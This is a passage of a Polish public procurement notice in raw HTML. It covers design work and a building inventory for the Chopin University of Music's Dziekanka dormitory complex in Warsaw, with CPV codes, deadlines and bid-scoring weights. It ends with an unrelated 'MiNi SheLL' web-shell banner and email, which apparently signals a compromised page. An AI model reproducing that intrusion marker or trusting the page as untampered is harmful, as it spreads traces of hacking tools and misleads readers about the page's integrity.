przedmiarów, spełniające wymogi zawarte w rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389); Ponadto pełnienie nadzoru autorskiego nad realizowanymi robotami budowlanymi na podstawie przygotowanego przez Wykonawcę projektu. Szczegółowy opis przedmiotu zamówienia stanowi załącznik do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Metodologia wykonywania przedmiotu zamówienia - 20</li>
<li>3. Harmonogram - 10</li>
<li>4. Proporcja wynagrodzenia za pełnienie nadzoru autorskiego - 15</li>
<li>5. Termin wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie inwentaryzacji budowlanej kompleksu budynków DS Dziekanka Uniwersytetu Muzycznego Fryderyka Chopina usytuowanych na działkach przy ul. Krakowskie Przedmieście 56, ul. Krakowskie Przedmieście 58/60, ul. Bednarska 29 i ul. Bednarska 31..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> inwentaryzacja budynków powinna zawierać: - Opis techniczny z uwzględnieniem lokalizacji, rodzaju i charakteru budynku, liczby kondygnacji, jego wysokości i powierzchni, uzbrojenia budynków w instalacje - Opis materiałów budowlanych, z jakich wykonane zostały poszczególne elementy budynku - Plan sytuacyjny z naniesionymi budynkami - Zwymiarowane rzuty wszystkich kondygnacji zarówno naziemnych, jak i podziemnych (z określeniem materiału wykończeniowego posadzek) oraz inwentaryzację przewodów wentylacyjnych, spalinowych i dymowych w skali 1:50 - Rzut więźby dachowej i dachu z przewodami kominowymi i wentylacyjnymi oraz sposobem odwodnienia 1:50 - Przekroje przez wszystkie kondygnacje z zaznaczonymi wysokościami charakterystycznych punktów (rzędne posadzek, parapetów, podestów klatek schodowych, tarasów, dachów i kominów, gzymsów i terenu przy budynku) - Elewacje budynków Do opracowania należy dołączyć zestawienie powierzchni użytkowych dla poszczególnych budynków. Opracowanie powinno być sporządzone zgodnie z obowiązującymi przepisami w tym zakresie. Dokumentacja musi być zgodna z przepisami techniczno-budowlanymi, Polskimi Normami i zasadami wiedzy technicznej. Szczegółowy opis przedmiotu zamówienia stanowi załącznik do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5, 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com